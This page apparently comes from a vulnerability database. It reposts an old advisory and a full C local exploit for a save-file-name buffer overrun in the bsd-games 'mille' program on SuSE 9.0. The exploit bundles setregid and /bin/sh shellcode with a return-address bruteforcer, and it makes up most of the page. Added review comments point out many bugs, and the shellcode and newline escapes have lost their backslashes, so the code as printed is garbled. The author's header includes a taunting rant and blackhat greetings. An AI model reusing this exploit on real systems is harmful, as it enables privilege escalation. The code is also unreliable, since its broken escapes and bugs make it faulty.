BSD-Games 2.x – Mille Local Save Game File Name Buffer Overrun
漏洞ID | 1054453 | 漏洞类型 | |
发布时间 | 2004-04-17 | 更新时间 | 2004-04-17 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | BSD | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10165/info
bsd-games mille is prone to a locally exploitable buffer overrun vulnerability. This issue is due to insufficient bounds checking when the user inputs a file name when saving a game.
This game is typically installed setgid `games`, so successful exploitation may allow privileges to be escalated to that group.
/* Suse 9.0 /usr/games/mille local gid=20(games) Xpl0i7
4u7h0r: N4rK07IX [email protected]
Scrip7kiddi3Z k33p y0ur h4ndz 4w4y , 7hiz n0t r00t spl0i7.
Bug: 0v3rfl0w wh3n s4ving th3 g4m3.
F0und by : N4rK07iX , th4nx to 0x7bf2 f0r his gr34t Suse B0X.
3xpl0i747i0n : mill3 iz fil73ring s0m3 ch4r4c73rz lik3 '0x90' '220' 4nd m0r3.
s0 us3 y0ur sm4r7 sh3llc0d3 , XOR 7h4t ch4rz.
Quick P47ch : rm -rf /usr/games/mille
Gr33tZ: 0x7bf2,mathmonkey,Efnet, Blackhat Community,d4mn3d,susp3ct3dguy,xoredman,gotcha,forkbomb
L4st W0rdz: Bigmu74n7 sen cok asagilik bi insansin dostum, dedigini kabul ediyorum, anlasmamiz vardi;
ama sen onunda ustesinden gelemedin,3. ye ne dersin? Evet Evet kabul ediyorsun biliyorum,
ne de olsa 31337 codersin !!!. Exploit kullanmadan Max 45 saniyede Nt deyim biliyorsun!!!(uzulme gececektir!)
5Mb hattim olmasa da 1700 cisco firewall nasil bypass edilir o zaman goreceksin....Senin kadar zengin
olmayabilirim fakat bizim delikanli gibi yuregimiz var. Bize yakismaz, senin gibi console-kiddy
bu ulkede yeterince var.. Yerinde olsam o worm un uzerinde biraz daha calisirdim, 2 aya kalmaz bitiyordu,
ne oldu yoksa fazla besleyemedin mi solucani,,, Sana ne kadar soylesem az dostum...Bu ulkeyi senin gibi Allah'siz
kitapsizlara birakmicaz bunu da bil. ITU de hidroligin orda yine bekliorum, taki senin yenilgiye doydugun ana kadar...
EFSANELER HIC BIR ZAMAN OLMEZLER !!!! Thanx.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/types.h>
#include <errno.h>
/* Exploit parameters.  BUFFERSIZE is the length of the payload handed to
 * mille as a save-file name; make_buffer() writes the candidate return
 * address into its last four bytes (offsets 108..111). */
#define BUFFERSIZE 112
#define PATH "/usr/games/mille"   /* not referenced anywhere in this listing; vuln_start() hard-codes the same path */
#define PROG "mille"              /* not referenced anywhere in this listing */
#define ENTER "n"                 /* evidently meant as a newline; the backslash appears to have been lost in this rendering */
#define NOP 0x90 // author's note: mille filters out the NOP byte, which is echoed as '~P'
#define DEC 40                    /* step between successive candidate return addresses in bruteforce() */
#define BRUTE_START 0xbffffff4    /* first candidate return address tried by bruteforce() */
/* Intended to return the current stack pointer through inline asm.  There is
 * no C-level return statement: the function relies on %eax still holding the
 * value when control returns, which the language does not guarantee (undefined
 * behaviour for a non-void function) and which is meaningless off x86.
 * Not called anywhere in this listing. */
unsigned long getesp()
{
__asm__("movl %esp, %eax");
}
/* Payload bytes that make_buffer() copies into the tail of `buffer`.
 * NOTE(review): the literals below read "x31xc0..." rather than hex escapes;
 * the backslashes appear to have been stripped by whatever rendered this page
 * (the same happened to every "n" line ending in the format strings), so as
 * printed these are plain ASCII characters.  The two inner comments are the
 * original author's description of each part. */
char shellcode[]= // author's note: put your own payload here
/* setregid (20,20) */
"x31xc0x31xdbx31xc9xb3x14xb1x14xb0x47"
"xcdx80"
/* exec /bin/sh */
"x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
"x69x89xe3x52x53x89xe1x8dx42x0bxcdx80";
/* Buffer passed to mille as the save-file name.  Filled by make_buffer(),
 * which never writes a terminating NUL into it. */
char buffer[BUFFERSIZE];
/* Declared but never used in this listing. */
char *pointer;
/* Drives the target interactively through popen(): sends "s" (presumably the
 * save command, given the page's description), then the contents of `buffer`
 * as the file name, then ENTER.  The page's description attributes the overrun
 * to this file-name prompt lacking a bounds check.
 *
 * Review notes: popen()'s result is used without a NULL check, so a failed
 * popen() is dereferenced by the first fprintf(); "rw" is not a mode POSIX
 * defines for popen() (only "r" and "w" are portable).  `filename` aliases the
 * global `buffer`, which make_buffer() leaves without a NUL terminator, so the
 * "%s" conversion reads past the end of the array.  pclose()'s status is
 * discarded. */
void vuln_start()
{
static FILE *lamemille;
static char *fireupmille = "/usr/games/mille";
static char savefile[]="s";
char *filename = buffer;
lamemille = popen(fireupmille,"rw");
fprintf(lamemille,"%s",savefile);
fflush(lamemille);
fprintf(lamemille,"%s",filename);
fflush(lamemille);
fprintf(lamemille,"%s",ENTER);
fflush(lamemille);
pclose(lamemille);
}
/* Forks; the child runs vuln_start(), the parent waits for it and reports how
 * it ended.  Returns the child's exit status if it exited normally, the signal
 * number if it was killed by a signal, and 1 otherwise.
 *
 * Review notes:
 *  - the child branch has no exit()/_exit() after vuln_start(); the child
 *    falls through to `return 1` and keeps running the caller's code as a
 *    second copy of this program;
 *  - `i` is unused, and the local `waitpid` shadows the library function of
 *    the same name from <sys/wait.h>;
 *  - the `COREDUMP(status)` test sits after a `return`, so it is unreachable,
 *    and no macro of that name is declared in this listing (<sys/wait.h>
 *    provides WCOREDUMP);
 *  - exit() is called without <stdlib.h> being included. */
int child_process()
{
int i;
int status;
pid_t pid;
pid_t waitpid;
pid = fork();
if(pid == -1)
{ fprintf(stderr,"[-]%s. Fork Failed!n",strerror(errno) );
exit(127);
}
else if (pid == 0)
{ vuln_start();
}
else {
waitpid = wait(&status);
if(waitpid == -1)
{ fprintf(stderr,"[-] %s. Wait Failed! n",strerror(errno));
exit(1);
}
else if(waitpid != pid)
abort();
else
{
if(WIFEXITED(status))
{ printf("Child Terminated Normally. Exit Code = %dn",WEXITSTATUS(status));
return WEXITSTATUS(status);
}
else if(WIFSIGNALED(status))
{ printf("Child Terminated Abnormally. Exit Code = %d.(%s)n",WTERMSIG(status),strsignal(WTERMSIG(status)));
return WTERMSIG(status);
/* unreachable: follows the return above */
if( COREDUMP(status) )
{ printf(" Core Dumped,Core File Generatedn");
}
}
else{ fprintf(stderr,"[-] Child Stoppedn");
}
}
}
return 1;
}
/* Fills the global `buffer` for one attempt: NOP fill, `shellcode` placed so
 * that it ends exactly four bytes before the end of the buffer, then the four
 * bytes of `ret` written at offsets 108..111 (least significant byte first).
 * Always returns 0.
 *
 * Review notes: there is no check that strlen(shellcode) <= BUFFERSIZE-4; a
 * longer payload makes the index expression wrap (size_t arithmetic) and the
 * memcpy() writes outside `buffer`.  The literal offsets 108..111 duplicate
 * BUFFERSIZE-4..BUFFERSIZE-1 rather than being derived from the macro.  No NUL
 * terminator is written, so `buffer` is not a C string afterwards.  The
 * `char` locals narrow an unsigned long (fine for byte extraction, though
 * `char` may be signed).  The commented-out malloc block is dead code. */
int make_buffer(unsigned long ret)
{
/*buffer = (char *)malloc(BUFFERSIZE*sizeof(char));
if(!buffer)
{
fprintf(stderr,"malloc() failed. ");
exit(-1);
}
*/
char l = (ret & 0x000000ff);
char a = (ret & 0x0000ff00) >> 8;
char m = (ret & 0x00ff0000) >> 16;
char e = (ret & 0xff000000) >> 24;
memset(buffer,NOP,BUFFERSIZE);
memcpy(&buffer[BUFFERSIZE-4-strlen(shellcode)],shellcode,strlen(shellcode));
buffer[108] = l;
buffer[109] = a;
buffer[110] = m;
buffer[111] = e;
return(0);
}
/* Tries candidate return addresses starting at firstret and DEC apart,
 * calling make_buffer() and child_process() for each, and stops at the first
 * one for which child_process() returns 0.  Always returns 0.
 *
 * Review notes: the loop condition `i < 0` holds only while `i` (a signed
 * long) is negative, i.e. only on a target where 0xbffffff4 does not fit in a
 * positive long (32-bit long); with a 64-bit long the body never executes.
 * `%x` is given a `long` argument (mismatched conversion specifier).  `ret`
 * is unused.  child_process() returns 1 in the child after vuln_start(), so
 * the child continues this loop as a separate process. */
int bruteforce(unsigned long firstret)
{
int found;
long i;
unsigned long ret;
fprintf(stdout,"[+] Bruteforce Starting!!!n");
fprintf(stdout,"firstret = %lun",firstret);
for(i = firstret ; i<0 ; i+=DEC)
{
fprintf(stdout,"[+] Testing Ret Address 0x%xn",i);
make_buffer(i);
found = child_process();
if(found == 0)
{ printf("Ret Adress Found = 0x%xn",i);
break;
}
}
return(0);
}
/* Prints the usage banner to stderr.  argv0 is echoed in the two usage lines;
 * every other line is fixed text.  (Text reproduced exactly, including the
 * missing newline escapes of the original listing.) */
void banner(char *argv0)
{
static const char *const header_lines[] = {
"---------------------------------------n",
"Suse 9.0 /usr/games/mille local Exploitn",
"4uth0r: N4rK07IXn",
"=> [email protected]",
};
for (size_t k = 0; k < sizeof header_lines / sizeof header_lines[0]; k++)
fputs(header_lines[k], stderr);
fprintf(stderr,"Brute Force: %s -bn",argv0);
fprintf(stderr,"Manuel Ret: %s -a retn",argv0);
fputs("---------------------------------------n", stderr);
}
/* Entry point.  Prints the banner unconditionally, then parses options:
 *   -b       run bruteforce() starting at BRUTE_START
 *   -a <ret> build one buffer for the given address, run child_process()
 *            once and exit
 *   -h       print the banner again
 *
 * Review notes: no return type is declared (implicit int, not valid since
 * C99); "h:" in optionlist makes -h require an argument that is never read;
 * `Opterr` is unused; strtoul()'s result is not validated (no endptr or
 * errno check); exit() is called without <stdlib.h> being included. */
main(int argc, char *argv[])
{
char *optionlist = "ba:h:";
int option;
unsigned long start = BRUTE_START;
unsigned long choose;
int u_r_script_kiddy = 0;
int Opterr = 1;
banner(argv[0]);
if(argc < 2)
fprintf(stderr,"Use -h for helpn");
while( (option = getopt(argc,argv,optionlist) ) != -1)
switch(option)
{
case 'b':
u_r_script_kiddy=1;
break;
case 'h':
banner(argv[0]);
break;
case 'a':
choose = strtoul(optarg,NULL,0);
make_buffer(choose);
child_process();
exit(0);
break;
case '?':
fprintf(stderr,"Unknown Option n");
banner(argv[0]);
exit(-1);
default:
banner(argv[0]);
exit(-1);
}
if(u_r_script_kiddy)
bruteforce(start);
return 0;
}